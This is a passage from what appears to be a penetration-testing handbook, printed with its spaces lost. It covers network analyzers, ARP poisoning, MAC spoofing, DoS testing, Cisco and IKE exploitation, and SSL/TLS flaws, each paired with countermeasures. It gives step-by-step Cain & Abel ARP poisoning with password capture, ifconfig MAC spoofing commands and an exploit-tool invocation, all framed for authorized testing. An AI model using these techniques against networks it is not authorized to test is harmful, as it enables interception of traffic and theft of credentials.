Whenyournetworkbehaveserratically,anetworkanalyzercanhelpyou

TrackandisolatemaliciousnetworkusageDetectmaliciousTrojanhorseapplicationsMonitorandtrackdownDoSattacks

NetworkanalyzerprogramsYoucanuseoneofthefollowingprogramsfornetworkanalysis:

SavviusOmniPeek(www.savvius.com)isoneofmyfavoritenetworkanalyzers.ItdoeseverythingIneedandmoreandisverysimpletouse.OmniPeekisavailableforWindowsoperatingsystems.TamoSoft’sCommView(www.tamos.com/products/commview)isagreat,low-cost,Windows-basedalternative.Cain&Abel(www.oxid.it/cain.html)isafreemultifunctionalpasswordrecoverytoolforperformingARPpoisoning,capturingpackets,crackingpasswords,andmore.Wireshark(www.wireshark.org),formerlyknownasEthereal,isafreealternative.IdownloadandusethistoolifIneedaquickfixanddon’thavemylaptopnearby.It’snotasuser-friendlyasmostofthecommercialproducts,butitisverypowerfulifyou’rewillingtolearnitsinsandouts.WiresharkisavailableforbothWindowsandOSX.ettercap(http://ettercap.github.io/ettercap/)isanotherpowerful(andfree)utilityforperformingnetworkanalysisandmuchmoreonWindows,Linux,andotheroperatingsystems.

Hereareafewcaveatsforusinganetworkanalyzer:

Tocapturealltraffic,youmustconnecttheanalyzertooneofthefollowing:AhubonthenetworkAmonitor/span/mirrorportonaswitchAswitchthatyou’veperformedanARPpoisoningattackon

Ifyouwanttoseetrafficsimilartowhatanetwork-basedIPSsees,youshouldconnectthenetworkanalyzertoahuborswitchmonitorport—orevenanetworktap—ontheoutsideofthefirewall,asshowninFigure9-8.Thisway,yourtesting





http://ettercap.github.io/ettercap/

enablesyoutoviewWhat’senteringyournetworkbeforethefirewallfilterseliminatethejunktraffic.What’sleavingyournetworkafterthetrafficpassesthroughthefirewall.

Figure9-8:Connectinganetworkanalyzeroutsidethefirewall.

Whetheryouconnectyournetworkanalyzerinsideoroutsideyourfirewall,youseeimmediateresults.Itcanbeanoverwhelmingamountofinformation,butyoucanlookfortheseissuesfirst:

Oddtraffic,suchas:AnunusualamountofICMPpacketsExcessiveamountsofmulticastorbroadcasttrafficProtocolsthataren’tpermittedbypolicyorshouldn’texistgivenyourcurrentnetworkconfiguration

Internetusagehabits,whichcanhelppointoutmaliciousbehaviorofarogueinsiderorsystemthathasbeencompromised,suchas:

WebsurfingandsocialmediaE-mailInstantmessagingandotherP2Psoftware

Questionableusage,suchas:Manylostoroversizedpackets,indicatinghackingtoolsormalwarearepresentHighbandwidthconsumptionthatmightpointtoaweborFTPserverthatdoesn’tbelong

Reconnaissanceprobesandsystemprofilingfromportscannersandvulnerabilityassessmenttools,suchasasignificantamountofinboundtrafficfromunknownhosts—especiallyoverportsthataren’tusedverymuch,suchasFTPortelnet.

Hackinginprogress,suchastonsofinboundUDPorICMPechorequests,SYNfloods,orexcessivebroadcasts.Nonstandardhostnamesonyournetwork.Forexample,ifyoursystemsarenamedComputer1,Computer2,andsoon,acomputernamedGEEKz4evURshouldraisearedflag.Hiddenservers(especiallyweb,SMTP,FTP,DNS,andDHCP)thatmightbeeatingnetworkbandwidth,servingillegalsoftware,oraccessingyournetworkhosts.Attacksonspecificapplicationsthatshowsuchcommandsas/bin/rm,/bin/ls,echo,andcmd.exeaswellasSQLqueriesandJavaScriptinjection,whichIcoverinChapter15.

Youmightneedtoletyournetworkanalyzerrunforquiteawhile—severalhourstoseveraldays,dependingonwhatyou’relookingfor.Beforegettingstarted,configureyournetworkanalyzertocaptureandstorethemostrelevantdata:

Ifyournetworkanalyzerpermitsit,configureittouseafirst-in,first-outbuffer.

Thisconfigurationoverwritestheoldestdatawhenthebufferfillsup,butitmightbeyouronlyoptionifmemoryandharddrivespacearelimitedonyournetworkanalysiscomputer.

Ifyournetworkanalyzerpermitsit,recordallthetrafficintoacapturefileandsaveittotheharddrive.Thisistheidealscenario—especiallyifyouhavealargeharddrive,suchas500GBormore.

Youcaneasilyfillseveralhundredgigabytes’worthofharddrivespaceinashortperiod.IhighlyrecommendrunningyournetworkanalyzerinwhatOmniPeekcallsmonitormode.Thisallowstheanalyzertokeeptrackofwhat’shappeningsuchasnetworkusageandprotocolsbutnotcaptureandstoreeverysinglepacket.Monitormode—ifsupportedbyyouranalyzer—isverybeneficialandisoftenallyouneed.

Whennetworktrafficdoesn’tlookrightinanetworkanalyzer,itprobablyisn’t.It’sbettertobesafethansorry.

Runabaselinewhenyournetworkisworkingnormally.Whenyouhaveabaseline,youcanseeanyobviousabnormalitieswhenanattackoccurs.

OnethingIliketocheckforisthetoptalkers(networkhostssending/receivingthemosttraffic)onthenetwork.Ifsomeoneisdoingsomethingmaliciousonthenetwork,suchashostinganFTPserverorrunningInternetfile-sharingsoftware,usinganetworkanalyzerisoftentheonlywayyou’llfindoutaboutit.Anetworkanalyzerisalsoagoodtoolfordetectingsystemsinfectedwithmalware,suchasavirusorTrojanhorse.Figure9-9showswhatitlooksliketohaveasuspectprotocolorapplicationrunningonyournetwork.

Figure9-9:OmniPeekcanhelpuncoversomeonerunninganillicitsystem,suchasanFTPserver.

Lookingatyournetworkstatistics,suchasbytespersecond,networkutilization,andinbound/outboundpacketcounts,isalsoagoodwaytodeterminewhethersomethingfishyisgoingon.Figure9-10containsnetworkstatisticsasseenthroughthepowerfulCommViewnetworkanalyzer.

Figure9-10:CommView’sinterfaceforviewingnetworkstatistics.

TamoSoft—themakerofCommView—hasanotherproductcalledNetResident(www.tamos.com/products/netresident)thatcantracktheusageofwell-knownprotocols,suchasHTTP,e-mail,FTP,andVoIP.AsshowninFigure9-11,youcanuseNetResidenttomonitorwebsessionsandplaythemback.

Figure9-11:NetResidentcantrackInternetusageandensuresecuritypoliciesareenforced.

http://www.tamos.com/products/netresident/

NetResidentalsohasthecapabilitytoperformARPpoisoningviaitsPromiSwitchtoolavailableundertheToolsmenu,whichallowsNetResidenttoseeeverythingonthelocalnetworksegment.IcoverARPpoisoninginthesection“TheMAC-daddyattack,”laterinthischapter.

CountermeasuresagainstnetworkprotocolvulnerabilitiesAnetworkanalyzercanbeusedforgoodorevil.Thegoodistohelpensureyoursecuritypoliciesarebeingfollowed.Theeviliswhensomeoneusesanetworkanalyzeragainstyou.Afewcountermeasurescanhelppreventsomeonefromusinganunauthorizednetworkanalyzer,althoughthere’snowaytopreventitcompletely.

Ifanexternalattackerormalicioususercanconnecttoyournetwork(physicallyorwirelessly),hecancapturepacketsonthenetwork,evenifyou’reusinganEthernetswitch.

Physicalsecurity

Ensurethatadequatephysicalsecurityisinplacetopreventsomeonefrompluggingintoyournetwork:

Keepthebadguysoutofyourserverroomandwiringcloset.

Ensurethattheweb,telnet,andSSHmanagementinterfacesonyourEthernetswitchesareespeciallysecuretokeepsomeonefromchangingtheswitchportconfigurationandseeingeverythinggoingacrossthewire.

Makesurethatunsupervisedareas,suchasanunoccupiedlobbyortrainingroom,don’thavelivenetworkconnections.

Fordetailsaboutphysicalsecurity,seeChapter7.

Networkanalyzerdetection

Youcanuseanetwork-orhost-basedutilitytodeterminewhethersomeoneisrunninganunauthorizednetworkanalyzeronyournetwork:

Sniffdet(http://sniffdet.sourceforge.net)forUNIX-basedsystemsPromiscDetect(http://ntsecurity.nu/toolbox/promiscdetect)forWindows

CertainIPSscanalsodetectwhetheranetworkanalyzerisrunningonyournetwork.ThesetoolsenableyoutomonitorthenetworkforEthernetcardsthatarerunninginpromiscuousmode.Yousimplyloadtheprogramsonyourcomputer,andtheprogramsalertyouiftheyseepromiscuousbehaviorsonthenetwork(Sniffdet)orlocalsystem(PromiscDetect).



TheMAC-daddyattackAttackerscanuseARP(AddressResolutionProtocol)runningonyournetworktomaketheirsystemsappearasyoursystemoranotherauthorizedhostonyournetwork.

ARPspoofingAnexcessivenumberofARPrequestscanbeasignofanARPspoofingattack(alsocalledARPpoisoning)onyournetwork.

Aclientrunningaprogram,suchasdsniff(www.monkey.org/~dugsong/dsniff)orCain&Abel(www.oxid.it/cain.html),canchangetheARPtables—thetablesthatstoreIPaddressestomediaaccesscontrol(MAC)addressmappings—onnetworkhosts.Thiscausesthevictimcomputerstothinktheyneedtosendtraffictotheattacker’scomputerratherthantothetruedestinationcomputerwhencommunicatingonthenetwork.ARPspoofingisusedduringman-in-the-middle(MITM)attacks.

SpoofedARPrepliescanbesenttoaswitch,whichrevertstheswitchtobroadcastmodeandessentiallyturnsitintoahub.Whenthisoccurs,anattackercansniffeverypacketgoingthroughtheswitchandcaptureanythingandeverythingfromthenetwork.

ThissecurityvulnerabilityisinherentinhowTCP/IPcommunicationsarehandled.

Here’satypicalARPspoofingattackwithahacker’scomputer(Hacky)andtwolegitimatenetworkusers’computers(JoeandBob):

1. HackypoisonstheARPcachesofvictimsJoeandBobbyusingdsniff,ettercap,orautilityhewrote.

2. JoeassociatesHacky’sMACaddresswithBob’sIPaddress.3. BobassociatesHacky’sMACaddresswithJoe’sIPaddress.4. Joe’strafficandBob’strafficaresenttoHacky’sIPaddressfirst.

5. Hacky’snetworkanalyzercapturesJoe’sandBob’straffic.

IfHackyisconfiguredtoactlikearouterandforwardpackets,itforwardsthetraffictoitsoriginaldestination.Theoriginalsenderandreceiverneverknowthedifference!

UsingCain&AbelforARPpoisoningYoucanperformARPpoisoningonyourswitchedEthernetnetworktotestyourIPSortoseehoweasyitistoturnaswitchintoahubandcaptureanythingandeverythingwithanetworkanalyzer.

http://www.monkey.org/~dugsong/dsniff/


ARPpoisoningcanbehazardoustoyournetwork’shardwareandhealth,causingdowntimeandmore.Sobecareful!

PerformthefollowingstepstouseCain&AbelforARPpoisoning:

1. LoadCain&AbelandthenclicktheSniffertabtoenterthenetworkanalyzermode.

TheHostspageopensbydefault.

2. ClicktheStart/StopAPRicon(theyellowandblackcircle).

TheARPpoisonrouting(howCain&AbelreferstoARPpoisoning)processstartsandenablesthebuilt-insniffer.

3. Ifprompted,selectthenetworkadapterinthewindowthatappearsandthenclickOK.

4. Clicktheblue+icontoaddhoststoperformARPpoisoningon.5. IntheMACAddressScannerwindowthatappears,ensuretheAllHostsin

MySubnetoptionisselectedandthenclickOK.6. ClicktheAPRtab(theonewiththeyellow-and-blackcircleicon)toloadthe

APRpage.

7. ClickthewhitespaceundertheuppermostStatuscolumnheading(justundertheSniffertab).

Thisre-enablestheblue+icon.

8. Clicktheblue+iconandtheNewARPPoisonRoutingwindowshowsthehostsdiscoveredinStep3.

9. Selectyourdefaultroute(inmycase,10.11.12.1).

Theright-handcolumnfillswithalltheremaininghosts,asshowninFigure9-12.

10. Ctrl+clickallthehostsintherightcolumnthatyouwanttopoison.

11. ClickOKandtheARPpoisoningprocessstarts.

Thisprocesscantakeanywherefromafewsecondstoafewminutesdependingonyournetworkhardwareandeachhosts’localTCP/IPstack.TheresultsofARPpoisoningonmytestnetworkareshowninFigure9-13.

12. YoucanuseCain&Abel’sbuilt-inpasswordsfeaturetocapturepasswordstraversingthenetworktoandfromvarioushostssimplybyclickingthePasswordstab.

Figure9-12:SelectingyourvictimhostsforARPpoisoninginCain&Abel.

Figure9-13:ARPpoisoningresultsinCain&Abel.

TheprecedingstepsshowhoweasyitistoexploitavulnerabilityandprovethatEthernetswitchesaren’tallthey’recrackeduptobefromasecurityperspective.

MACaddressspoofingMACaddressspoofingtrickstheswitchintothinkingyourcomputerissomethingelse.Yousimplychangeyourcomputer’sMACaddressandmasqueradeasanotheruser.

Youcanusethistricktotestaccesscontrolsystems,suchasyourIPS/firewall,andevenyouroperatingsystemlogincontrolsthatcheckforspecificMACaddresses.

UNIX-basedsystems

InUNIXandLinux,youcanspoofMACaddresseswiththeifconfigutility.Followthesesteps:

1. Whileloggedinasroot,useifconfigtoenteracommandthatdisablesthenetworkinterface.

Insertthenetworkinterfacenumberthatyouwanttodisable(usually,eth0)intothecommand,likethis:

[root@localhostroot]#ifconfigeth0down

2. EnteracommandfortheMACaddressyouwanttouse.

InsertthefakeMACaddressandthenetworkinterfacenumber(eth0)intothecommandagain,likethis:

[root@localhostroot]#ifconfigeth0hwether

new_mac_address

Youcanuseamorefeature-richutilitycalledGNUMACChanger(https://github.com/alobbs/macchanger)forLinuxsystems.

Windows

YoucanuseregedittoedittheWindowsRegistry,butIlikeusinganeatWindowsutilitycalledSMAC(www.klcconsulting.net/smac),whichmakesMACspoofingasimpleprocess.FollowthesestepstouseSMAC:

1. Loadtheprogram.2. SelecttheadapterforwhichyouwanttochangetheMACaddress.3. EnterthenewMACaddressintheNewSpoofedMACAddressfieldsand

clicktheUpdateMACbutton.4. Stopandrestartthenetworkcardwiththesesteps:

a. Right-clickthenetworkcardinNetworkandDialupConnectionsandthenchooseDisable.

b. Right-clickagainandthenchooseEnableforthechangetotakeeffect.

Youmighthavetorebootforthistoworkproperly.

https://github.com/alobbs/macchanger

http://www.klcconsulting.net/smac/

5. ClicktheRefreshbuttonintheSMACinterface.

ToreverseRegistrychangeswithSMAC,followthesesteps:

1. SelecttheadapterforwhichyouwanttochangetheMACaddress.2. ClicktheRemoveMACbutton.3. Stopandrestartthenetworkcardwiththesesteps:

a. Right-clickthenetworkcardinNetworkandDialupConnectionsandthenchooseDisable.

b. Right-clickagainandthenchooseEnableforthechangetotakeeffect.

Youmighthavetorebootforthistoworkproperly.

4. ClicktheRefreshbuttonintheSMACinterface.

YoushouldseeyouroriginalMACaddressagain.

CountermeasuresagainstARPpoisoningandMACaddressspoofingattacksAfewcountermeasuresonyournetworkcanminimizetheeffectsofanattackagainstARPandMACaddresses:

Prevention:YoucanpreventMACaddressspoofingifyourswitchescanenableportsecuritytopreventautomaticchangestotheMACaddresstables.

NorealisticcountermeasuresforARPpoisoningexist.TheonlywaytopreventARPpoisoningistocreateandmaintainstaticARPentriesinyourswitchesforeveryhostonthenetwork.Thisissomethingthathardlyanynetworkadministratorhastimetodointoday’sratrace.

Detection:YoucandetectthesetwotypesofhacksthroughanIPSorastandaloneMACaddress–monitoringutility.

Arpwatch(http://linux.maruhn.com/sec/arpwatch.html)isaLinux-basedprogramthatalertsyouviae-mailwhenitdetectschangesinMACaddressesassociatedwithspecificIPaddressesonthenetwork.

http://linux.maruhn.com/sec/arpwatch.html

WhatyouneedtoknowaboutadvancedmalwareAdvancedmalware(alsoknownasadvancedpersistentthreatorAPT)hasbeenalltheragelately.Suchtargetedattacksarehighly-sophisticatedandextremelydifficulttodetect—thatis,unlessyouhavethepropercontrolsandthenetworkand/orhostlayers.IonceworkedonaprojectwherealargeenterprisewastargetedbyaNationState(presumablybecauseofthelineofworktheenterprisewasin)andendeduphavingover10,000Windowsserversandworkstationsinfectedbymalware.Theenterprise’straditional,bigboxantivirussoftwarewasnonethewiser.Theprojectturnedouttobeanextensiveexerciseinincidentresponseandforensics.Theinfectionwastracedbacktoaphishingattackthatsubsequentlyspreadtoallthesystemswhile,atthesametime,installingpassword-crackingtoolstoattempttocrackthelocalSAMfileoneachWindowsmachine.

Thisadvancedmalwareinfectionisjustoneofcountlessexamplesofnewadvancedmalwarethatmostorganizationsarenotpreparedtoprevent.Theobvioussolutiontopreventsuchattacksistokeepusersfromclickingmaliciouslinksandpreventingmalwarefrombeing“dropped”ontothesystem.That’stough,ifnotimpossible,toprevent.Thenextbestthingistousetechnologytoyouradvantage.AdvancedmalwaremonitoringandthreatprotectiontoolssuchasDamballaFailsafe(www.damballa.com/solutions/damballa_failsafe.php),Next-GenerationFirewallssuchaswhat’sofferedbyPaloAltoNetworks(www.paloaltonetworks.com),andwhitelisting,a.k.a.“positivesecurity”technologiessuchastheBit9SecurityPlatform(www.bit9.com/solutions/security-platform)thathelpsprotectthehostareagreatwaytofightthisthreat.

Thebottomline:Don’tunderestimatetheriskandpoweroftargetedmalwareattacks.

TestingdenialofserviceattacksDenialofservice(DoS)attacksareamongthemostcommonhackerattacks.Ahackerinitiatessomanyinvalidrequeststoanetworkhostthatthehostusesallitsresourcesrespondingtotheinvalidrequestsandignoresthelegitimaterequests.

DoSattacksDoSattacksagainstyournetworkandhostscancausesystemstocrash,datatobelost,andeveryusertojumponyourcasewonderingwhenInternetaccesswillberestored.

HerearesomecommonDoSattacksthattargetanindividualcomputerornetworkdevice:

SYNfloods:TheattackerfloodsahostwithTCPSYNpackets.PingofDeath:TheattackersendsIPpacketsthatexceedthemaximumlengthof65,535bytes,whichcanultimatelycrashtheTCP/IPstackonmanyoperatingsystems.WinNuke:ThisattackcandisablenetworkingonolderWindows95andWindowsNTcomputers.

DistributedDoS(DDoS)attackshaveanexponentiallygreaterimpactontheirvictims.OneofthemostfamouswastheDDoSattackagainsteBay,Yahoo!,CNN,anddozensofotherwebsitesbyahackerknownasMafiaBoy.Whileupdatingthisbooktothethirdedition,therewasahighlypublicizedDDoSattackagainstTwitter,Facebook,andothersocialmediasites.TheattackwasapparentlyaimedatoneuserfromGeorgia(theformerSovietcountry,notthestatewhereIlive),butitaffectedeveryoneusingthesesites.Icouldn’ttweet,andmanyofmyfriendsandfamilymemberscouldn’tseewhateveryonewasblabbingaboutonFacebook(oh,thehumanity!).Therehavebeen

http://www.damballa.com/solutions/damballa_failsafe.php

https://www.paloaltonetworks.com/

https://www.bit9.com/solutions/security-platform/

numerousotherhighly-publicizedDDoSattackssincethen.Thinkaboutthis:WhenhundredsofmillionsofpeoplecanbetakenofflinebyonetargetedDDoSattack,youcanseewhyunderstandingthedangersofdenialofserviceagainstyourbusiness’ssystemsandapplicationsisimportant.

TestingDenialofservicetestingisoneofthemostdifficultsecuritychecksyoucanrun.Therejustaren’tenoughofyouandyourcomputerstogoaround.Don’tfret.Youcanrunafewteststoseewhereyou’reweak.YourfirsttestshouldbeasearchforDoSvulnerabilitiesfromavulnerability-scanningperspective.Usingvulnerabilityscanners,suchasNexpose(www.rapid7.com/products/nexpose)andAppSpider(www.rapid7.com/products/appspider),youcanfindmissingpatchesandconfigurationweaknessesthatcanleadtodenialofservice.

IonceperformedasecurityassessmentwhereIusedQualystofindavulnerabilityinanolderversionofOpenSSLrunningonawebserver.AswithmostDoSfindings,Ididn’tactuallyexploitthevulnerabilitybecauseIdidn’twanttotakedowntheproductionsystem.Instead,Ilisteditasa“mediumpriority”vulnerability—anissuethathadthepotentialtobeexploited.MyclientpushedbackandsaidOpenSSLwasn’tonthesystem.Withpermission,IdownloadedtheexploitcodeavailableontheInternet,compiledit,andranitagainstmyclient’sserver.Sureenough,ittooktheserveroffline.

Atfirst,myclientthoughtitwasafluke,butaftertakingtheserverofflineagain,heboughtintothevulnerability.ItendedupthathewasusinganOpenSSLderivative,hencethevulnerability.Hadmyclientnotfixedtheproblem,therecouldhavebeenanynumberofattackersaroundtheworldtaking—andkeeping—thisproductionsystemoffline,whichcouldhavebeenbothtrickyandtimeconsumingtotroubleshoot.Notgoodforbusiness!

Don’ttestforDoSunlessyouhavetestsystemsorcanperformcontrolledtestswiththepropertools.PoorlyplannedDoStestingisajobsearchinthemaking.It’sliketryingtodeletedatafromanetworkshareandhopingthattheaccesscontrolsinplacearegoingtopreventit.

OtherDoStestingtoolsworthcheckingoutareUDPFlood(www.mcafee.com/us/downloads/free-tools/udpflood.aspx),Blast(www.mcafee.com/us/downloads/free-tools/blast.aspx),NetScanToolsPro,andCommView.

CountermeasuresagainstDoSattacksMostDoSattacksaredifficulttopredict,buttheycanbeeasytoprevent:

Testandapplysecuritypatches(includingservicepacksandfirmwareupdates)assoonaspossiblefornetworkhosts,suchasroutersandfirewalls,as


http://www.rapid7.com/products/appspider

http://www.mcafee.com/us/downloads/free-tools/udpflood.aspx

http://www.mcafee.com/us/downloads/free-tools/blast.aspx

wellasforserverandworkstationoperatingsystems.

UseanIPStomonitorregularlyforDoSattacks.

Youcanrunanetworkanalyzerincontinuouscapturemodeifyoucan’tjustifythecostofanall-outIPSsolutionanduseittomonitorforDoSattacks.

Configurefirewallsandrouterstoblockmalformedtraffic.Youcandothisonlyifyoursystemssupportit,sorefertoyouradministrator’sguidefordetails.MinimizeIPspoofingbyfilteringoutexternalpacketsthatappeartocomefromaninternaladdress,thelocalhost(127.0.0.1),oranyotherprivateandnon-routableaddress,suchas10.x.x.x,172.16.x.x–172.31.x.x,or192.168.x.x.ThefollowingpaperfromCiscoSystemsprovidesmoreinformation:www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_10-4/104_ip-

spoofing.html.BlockallICMPtrafficinboundtoyournetworkunlessyouspecificallyneedit.Eventhen,youshouldallowittocomeinonlytospecifichosts.DisableallunneededTCP/UDPsmallservices,suchasechoandchargen.

EstablishabaselineofyournetworkprotocolsandtrafficpatternsbeforeaDoSattackoccurs.Thatway,youknowwhattolookfor.AndperiodicallyscanforsuchpotentialDoSvulnerabilitiesasrogueDoSsoftwareinstalledonnetworkhosts.

IfyougetyourselfinarealbindandendupunderdirectDoSassault,youcanreachouttomanagedservicevendorssuchasImperva’sIncapsula(www.incapsula.com),CloudFlare(www.cloudflare.com),andDOSarrest(www.dosarrest.com)whocanhelpyouout.

Workwithaminimumnecessarymentality(nottobeconfusedwithhavingtoomanycraftbeers)whenconfiguringyournetworkdevices,suchasfirewallsandrouters:

Identifytrafficthatisnecessaryforapprovednetworkusage.Allowthetrafficthat’sneeded.Denyallothertraffic.

Ifworsecomestoworst,you’llneedtoworkwithyourISPandseewhethertheycanblockDoSattacksontheirend.

http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_10-4/104_ip-spoofing.html

https://www.incapsula.com

https://www.cloudflare.com

http://www.dosarrest.com

DetectingCommonRouter,Switch,andFirewallWeaknesses

InadditiontothemoretechnicalexploitsthatIcoverinthischapter,somehigh-levelsecurityvulnerabilitiescommonlyfoundonnetworkdevicescancreatemanyproblems.

FindingunsecuredinterfacesYouwanttoensurethatHTTPandtelnetinterfacestoyourrouters,switches,andfirewallaren’tconfiguredwithablank,default,orotherwiseeasy-to-guesspassword.Thisadvicesoundslikeano-brainer,butit’sbyfaroneofthemostcommonweaknesses.Whenamaliciousinsiderorotherattackergainsaccesstoyournetworkdevices,heownsthenetwork.Hecanthenlockoutadministrativeaccess,setupback-dooruseraccounts,reconfigureports,andevenbringdowntheentirenetworkwithoutyoueverknowing.

IoncefoundasimplepasswordthatasystemsintegratorhadconfiguredonaCiscoASAfirewallandwasabletologintothefirewallwithfulladministrativerights.Justimaginewhatcouldhappeninthissituationifsomeonewithmaliciousintentcameacrossthispassword.Lessonlearned:It’sthelittlethingsthatcangetyou.Knowwhatyourvendorsaredoingandkeepaneyeonthem!

AnotherweaknessisrelatedtoHTTPandtelnetbeingenabledandusedonmanynetworkdevices.Caretoguesswhythisisaproblem?Well,anyonewithsomefreetoolsandafewminutesoftimecansniffthenetworkandcapturelogincredentialsforthesesystemswhenthey’rebeingsentincleartext.Whenthathappens,anythinggoes.

ExploitingIKEweaknessesBusinessesrunningaVPNonarouterorfirewallarecommon.Ifyoufallintothiscategory,chancesaregoodthatyourVPNisrunningtheInternetKeyExchange(IKE)protocol,whichhasacoupleofwell-knownexploitableweaknesses:

It’spossibletocrackIKE“aggressivemode”pre-sharedkeysusingCain&AbelandtheIKECracktool(http://ikecrack.sourceforge.net).SomeIKEconfigurations,suchasthoseincertainCiscoPIXfirewalls,canbetakenoffline.Alltheattackerhastodoissend10packetspersecondat122byteseachandyouhaveaDoSattackonyourhands.

Youcanmanuallypokearoundtoseewhetheryourrouter,switches,andfirewallsarevulnerabletotheseissues,butthebestwaytofindthisinformationistouseawell-knownvulnerabilityscanner,suchasNexpose.Afteryoufindwhichvulnerabilities

http://ikecrack.sourceforge.net/

exist,youcantakethingsastepfurtherbyusingtheCiscoGlobalExploitertool(availableviatheKaliLinuxtoolset).TorunCiscoGlobalExploiter,followthesesteps:

1. DownloadandburntheBackTrackLinuxISOimagetoDVDorboottheimagedirectlythroughVMwareorVirtualBox.

2. AfteryouentertheKaliLinuxGUI,clickApplications,VulnerabilityAnalysis,CiscoTool,andthencisco-global-exploiter.

3. Enterthecommandperlcge.plip_addressexploit_number,asshowninFigure9-14.

Figure9-14:CiscoGlobalExploitertoolforexploitingwell-knownCiscoweaknesses.

AnotherCiscorouter-relatedtooliscalledSynfulKnockScanner(http://talosintel.com/scanner)thattestssystemsforthenastySYNfulKnockmalwarethatwasdiscoveredin2015.

Goodscannersandexploitationtoolswillsaveyouatonoftimeandeffortthatyoucanspendonother,moreimportantthings,suchasFacebookandTwitter.

UncoveringissueswithSSLandTLSSSLandTransportLayerSecurity(TLS)werelongtoutedasthesolutionforsecuringnetworkcommunications.However,recently,SSLandTLShavecomeunderfirewithdemonstrableexploitssuchasHeartbleed,PaddingOracleOnDowngradedLegacyEncryption(POODLE),andFactoringAttackonRSA-EXPORTKeys(FREAK).

GeneralsecurityvulnerabilitiesrelatedtoSSLandTLSareoftenuncoveredbyvulnerabilityscannerssuchasNexposeandNetsparker.InadditiontothethreeSSL/TLSvulnerabilitiesabove,beonthelookoutforthefollowingflawsaswell:

http://talosintel.com/scanner/

SSLversions2or3aswellasTLSversions1.0or1.1inuse.WeakencryptioncipherssuchasRC4andSHA-1.

IfyouareunsureaboutexistingSSLandTLSvulnerabilitiesonyoursystems,youdon’thavetouseavulnerabilityscanneratall.QualyshasanicewebsitecalledSSLLabs(www.ssllabs.com)thatwillscanforthesevulnerabilitiesforyou.

Ididn’tusedtobetooconcernedwithSSLandTLS-relatedvulnerabilities,butassecurityresearchersandcriminalhackershavebeendemonstrating,thethreatisrealandneedstobeaddressed.

https://www.ssllabs.com

PuttingUpGeneralNetworkDefensesRegardlessofthespecificattacksagainstyoursystem,afewgoodpracticescanhelppreventmanynetworkproblems:

Usestatefulinspectionrulesthatmonitortrafficsessionsforfirewalls.ThiscanhelpensurethatalltraffictraversingthefirewallislegitimateandcanpreventDoSattacksandotherspoofingattacks.Implementrulestoperformpacketfilteringbasedontraffictype,TCP/UDPports,IPaddresses,andevenspecificinterfacesonyourroutersbeforethetrafficisallowedtoenteryournetwork.UseproxyfilteringandNetworkAddressTranslation(NAT)orPortAddressTranslation(PAT).Findandeliminatefragmentedpacketsenteringyournetwork(fromFraggleoranothertypeofattack)viaanIPS.Includeyournetworkdevicesinyourvulnerabilityscans.Ensureyournetworkdeviceshavethelatestvendorfirmwareandpatchesapplied.Setstrongpasswords—betteryet,passphrases—onallnetworksystems.IcoverpasswordsinmoredetailinChapter8.Don’tuseIKEaggressivemodepre-sharedkeysforyourVPN.Ifyoumust,ensurethepassphraseisstrongandchangedperiodically(suchasevery6–12months).AlwaysuseTLS(viaHTTPS,etc.)orSSHwhenconnectingtonetworkdevices.DisableSSLandweakciphersandonlyuseTLSversion1.2andstrongcipherssuchasSHA-2wherepossible.Segmentthenetworkanduseafirewallonthefollowing:

TheDMZTheinternalnetworkCriticalsubnetworksbrokendownbybusinessfunctionordepartment,suchasaccounting,finance,HR,andresearch

Chapter10

WirelessNetworksInThisChapter

Understandingrisksofwirelessnetworks

Selectingwirelessnetworkhackingtools

Crackingwirelessencryption

Minimizingwirelessnetworkrisks

Wirelesslocalareanetworks(orWi-Fi)—specifically,theonesbasedontheIEEE802.11standard—areincreasinglybeingdeployedintobothbusinessandhomenetworks.Wi-Fihasbeentheposterchildforweaksecurityandnetworkhackattackssincetheinceptionof802.11adecadeandahalfago.ThestigmaofunsecureWi-Fiisstartingtowane,butthisisn’tthetimetoloweryourdefenses.

Wi-Fioffersatonofbusinessvalue,fromconveniencetoreducednetworkdeploymenttime.Whetherornotyourorganizationallowswirelessnetworkaccess,youprobablyhaveit,sotestingforWi-Fisecurityvulnerabilitiesiscritical.Inthischapter,Icoversomecommonwirelessnetworksecurityvulnerabilitiesthatyoushouldtestfor,andIdiscusssomecheapandeasycountermeasuresthatyoucanimplementtohelpensurethatWi-Fiisn’tmoreofarisktoyourorganizationthanit’sworth.

UnderstandingtheImplicationsofWirelessNetworkVulnerabilities

Wi-Fiisverysusceptibletoattack—evenmoresothanwirednetworks(discussedinChapter9)ifit’snotconfiguredordeployedproperly.Wirelessnetworkshavelong-standingvulnerabilitiesthatcanenableanattackertobringyournetworktoitskneesorallowyoursensitiveinformationtobeextractedrightoutofthinair.Ifyourwirelessnetworkiscompromised,youcanexperiencethefollowingproblems:

Lossofnetworkaccess,includinge-mail,web,andotherservicesthatcancausebusinessdowntimeLossofsensitiveinformation,includingpasswords,customerdata,intellectualproperty,andmoreRegulatoryconsequencesandlegalliabilitiesassociatedwithunauthorizedusersgainingaccesstoyourbusinesssystems

Mostofthewirelessvulnerabilitiesareintheimplementationofthe802.11standard.Wirelessaccesspoints(APs)andclientsystemshavesomevulnerabilitiesaswell.

Variousfixeshavecomealonginrecentyearstoaddressthesevulnerabilities,yetstillmanyofthesefixeshaven’tbeenproperlyappliedoraren’tenabledbydefault.Youremployeesmightalsoinstallroguewirelessequipmentonyournetworkwithoutyourknowledge.Thenthere’s“free”Wi-Fipracticallyeverywhereyourmobileworkforcegoes.Fromcoffeeshopstohotelstoconferencecenters,theseInternetconnectionsareoneofthemostseriousthreatstoyouroverallinformationsecurityandaprettydifficultonetofight.EvenwhenWi-Fiishardenedandallthelatestpatcheshavebeenapplied,youstillmighthavesecurityproblems,suchasdenialofservice(DoS),man-in-the-middleattacks,andencryptionkeyweaknesses(likeyouhaveonwirednetworks—seeChapter9),thatwilllikelybearoundforawhile.

ChoosingYourToolsSeveralgreatwirelesssecuritytoolsareavailableforboththeWindowsandLinuxplatforms.Earlieron,Linuxwirelesstoolswereabeartoconfigureandrunproperly,probablybecauseI’mnotthatsmart.However,thatproblemhaschangedinrecentyearswithprogramssuchasKismet(www.kismetwireless.net),Wellenreiter(http://sourceforge.net/projects/wellenreiter),andKaliLinux(www.kali.org).

